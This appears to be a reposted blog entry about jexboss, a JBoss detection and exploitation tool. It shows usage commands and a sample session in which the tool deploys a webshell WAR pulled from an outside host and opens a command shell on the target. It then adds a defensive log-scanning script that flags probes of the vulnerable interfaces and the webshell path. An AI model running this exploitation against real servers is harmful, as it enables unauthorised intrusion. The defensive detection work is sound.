jexboss – JBoss vulnerability detection/exploitation tool

Posted by 黑白之道



Project URL

https://github.com/joaomatosf/jexboss

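Project overview

jexboss is a JBoss vulnerability detection and exploitation tool written in Python. It can detect and exploit three vulnerabilities (web-console, jmx-console and JMXInvokerServlet), and it can obtain a shell.

Usage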

$ git clone https://github.com/joaomatosf/jexboss.git
$ cd jexboss
$ python jexboss.py https://site-teste.com
* — JexBoss: Jboss verify and EXploitation Tool — *
| |
| @author: João Filho Matos Figueiredo |
| @contact: joaomatosf@gmail.com |
| |
| @update: https://github.com/joaomatosf/jexboss |
#______________________________________________________#
** Checking Host: https://site-teste.com **

* Checking web-console: [ OK ]
* Checking jmx-console: [ VULNERABLE ]
* Checking JMXInvokerServlet: [ VULNERABLE ]
* Do you want to try to run an automated exploitation via “jmx-console” ?
This operation will provide a simple command shell to execute commands on the server..
Continue only if you have permission!
yes/NO ? yes

* Sending exploit code to https://site-teste.com. Wait…
* Info: This exploit will force the server to deploy the webshell
available on: http://www.joaomatosf.com/rnp/jbossass.war
* Successfully deployed code! Starting command shell, wait…

* – – – – – – – – – – – – – – – – – – – – LOL – – – – – – – – – – – – – – – – – – – – *

* https://site-teste.com:

Linux seglinux 3.18.4-1.el6.elrepo.x86_64 #1 SMP Wed Jan 28 13:28:52 EST 2015 x86_64 x86_64 x86_64 GNU/Linux

CentOS release 6.5 (Final)

uid=509(jboss) gid=509(jboss) grupos=509(jboss) context=system_u:system_r:initrc_t:s0

[Type commands or “exit” to finish]
Shell> pwd
/usr/jboss-6.1.0.Final/bin
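From the defender's side, the session above leaves traces in the server's access log: requests to the three interfaces the tool checks, followed by requests to the deployed application. The following is an added example, not part of the original post or of jexboss. It assumes a common/combined access-log format, the default JBoss URL prefixes for the three interfaces, and /jbossass as the context path of the deployed jbossass.war; the log lines are constructed.

```python
import re
from urllib.parse import unquote

# Interfaces named on this page -> URL prefix. The prefixes are assumed JBoss
# defaults; /jbossass is the assumed context path of a deployed jbossass.war.
WATCHED = {
    "web-console": "/web-console",
    "jmx-console": "/jmx-console",
    "JMXInvokerServlet": "/invoker/JMXInvokerServlet",
    "jbossass-webshell": "/jbossass",
}

# Common/combined access-log layout (assumed).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(path):
    """Return the watched interface a request path belongs to, or None."""
    clean = unquote(path.split("?", 1)[0])  # drop query, undo %-encoding
    for name, prefix in WATCHED.items():
        if clean == prefix or clean.startswith(prefix + "/"):
            return name
    return None

def scan(lines):
    """Per client IP: interfaces probed, interfaces answering 200, sweep flag."""
    report = {}
    for line in lines:
        m = LOG_RE.match(line)
        name = classify(m.group("path")) if m else None
        if name is None:
            continue
        entry = report.setdefault(m.group("ip"), {"probed": set(), "open": set()})
        entry["probed"].add(name)
        if m.group("status") == "200":  # heuristic: served without an auth challenge
            entry["open"].add(name)
    for entry in report.values():
        entry["sweep"] = len(entry["probed"]) >= 2  # several interfaces, one client
    return report

# Constructed sample log lines (documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2016:10:00:01 +0000] "GET /web-console/ HTTP/1.1" 401 0',
    '203.0.113.7 - - [10/Mar/2016:10:00:02 +0000] "GET /jmx-console/ HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Mar/2016:10:00:03 +0000] "GET /invoker/JMXInvokerServlet HTTP/1.1" 200 3500',
    '203.0.113.7 - - [10/Mar/2016:10:00:09 +0000] "GET /jbossass/ HTTP/1.1" 200 64',
    '198.51.100.20 - - [10/Mar/2016:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, e in scan(SAMPLE_LOG).items():
        print(ip, sorted(e["probed"]), "open:", sorted(e["open"]), "sweep:", e["sweep"])
```

Any interface listed under "open" is being served without an authentication challenge and should be restricted or removed; a 200 on the /jbossass path means an unexpected application is deployed and the host should be treated as compromised.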

